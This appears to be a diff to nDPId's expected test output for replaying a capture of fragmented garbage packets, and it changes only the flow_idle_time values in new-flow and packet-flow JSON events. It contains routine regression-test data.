-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6574,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1534244031080,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244031080,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAkdSP0dSP3NSPzc0ODM5NinCaAAA"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6574,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031080,"flow_last_seen":1534244031080,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244031080,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18258,"dst_port":16199,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6574,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1534244031080,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244031080,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAkdSP0dSP3NSPzc0ODM5NinCaAAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":6575,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244031080} 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":6575,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244031080,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAigqJl4lJCNAIUAjJCVeJio="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":6576,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244031080} @@ -13772,8 +13772,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":6885,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244031080,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAiomXiUkI0AjJCVeJiooKiY="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":6886,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244031084} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":6886,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244031080,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAl4lJCMmKihL"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6887,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031384,"flow_last_seen":1534244031384,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244031384,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18762,"dst_port":18503,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6887,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1534244031384,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244031384,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAklKSEdGRDIqJkRGR0hKSybhaQAA"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6887,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031384,"flow_last_seen":1534244031384,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244031384,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18762,"dst_port":18503,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6887,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1534244031384,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244031384,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAklKSEdGRDIqJkRGR0hKSybhaQAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":6888,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244031384} 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":6888,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244031384,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAl4lJCMjRVRSJVleVSZJKk8="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":6889,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244031384} @@ -14398,8 +14398,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":7198,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244031384,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAjpoZGZsa2RhPkw8TU5CSEc="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":7199,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244031388} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":7199,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244031384,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAkZERVcjQCQl"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7200,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031688,"flow_last_seen":1534244031688,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244031688,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24136,"dst_port":16967,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7200,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1534244031688,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244031688,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAl5IQkdWCjQyMTQ2MzE5ODLvxgAA"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7200,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031688,"flow_last_seen":1534244031688,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244031688,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24136,"dst_port":16967,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7200,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1534244031688,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244031688,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAl5IQkdWCjQyMTQ2MzE5ODLvxgAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":7201,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244031688} 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":7201,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244031688,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAjA1MSkoKiZeJSQjQCMkJV4="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":7202,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244031688} @@ -15024,8 +15024,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":7511,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244031688,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAiomXiUkI3JzZGx1aGdrZmQ="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":7512,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244031693} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":7512,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244031688,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAnNia252Yy8u"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7513,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031993,"flow_last_seen":1534244031993,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244031993,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":29799,"dst_port":26228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7513,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1534244031993,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244031993,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAnRnZnRnP0dSP0dSP3NSPzcd6AAA"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7513,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031993,"flow_last_seen":1534244031993,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244031993,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":29799,"dst_port":26228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7513,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1534244031993,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244031993,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAnRnZnRnP0dSP0dSP3NSPzcd6AAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":7514,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244031993} 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":7514,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244031993,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAjQ4Mzk2KSgqJl4lJCNAIUA="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":7515,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244031993} @@ -15650,8 +15650,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":7824,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244031993,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAl4mKigpKComXiUkI0AjJCU="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":7825,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244031998} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":7825,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244031993,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAl4mKigqJl4l"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7826,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032298,"flow_last_seen":1534244032298,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244032298,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9251,"dst_port":9770,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7826,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1534244032298,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244032298,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAiQjJiooS0lKSEdGRDIqJkRIiQAA"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7826,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032298,"flow_last_seen":1534244032298,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244032298,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9251,"dst_port":9770,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7826,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1534244032298,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244032298,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAiQjJiooS0lKSEdGRDIqJkRIiQAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":7827,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244032298} 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":7827,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244032298,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAkZHSEpLJl4lJCMjRVRSJVk="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":7828,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244032298} @@ -16276,8 +16276,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":8137,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244032298,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAkkqT1B7IjpoZGZsa2RhPkw="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":8138,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244032302} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":8138,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244032298,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAjxNTkJIR0ZE"} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8139,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032602,"flow_last_seen":1534244032602,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244032602,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":17751,"dst_port":9024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8139,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1534244032602,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244032602,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAkVXI0AkJV5IQkdWCjQyMTQCqQAA"} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8139,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032602,"flow_last_seen":1534244032602,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244032602,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":17751,"dst_port":9024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8139,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1534244032602,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244032602,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAkVXI0AkJV5IQkdWCjQyMTQCqQAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":8140,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244032602} 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":8140,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244032602,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAjYzMTk4MjA1MSkoKiZeJSQ="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":8141,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244032602} @@ -16902,8 +16902,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":8450,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244032602,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAiQlXiYqKComXiUkI3JzZGw="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":8451,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244032607} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":8451,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244032602,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAnVoZ2tmZHNi"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8452,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032907,"flow_last_seen":1534244032907,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244032907,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":27502,"dst_port":30307,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8452,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1534244032907,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244032907,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAmtudmMvLnRnZnRnP0dSP0cRsQAA"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8452,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032907,"flow_last_seen":1534244032907,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244032907,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":27502,"dst_port":30307,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8452,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1534244032907,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244032907,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAmtudmMvLnRnZnRnP0dSP0cRsQAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":8453,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244032907} 00355{"packet_event_id":1,"packet_event_name":"packet","packet_id":8453,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244032907,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAlI\/c1I\/NzQ4Mzk2KSgqJl4="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":8454,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244032907} @@ -17528,8 +17528,8 @@ 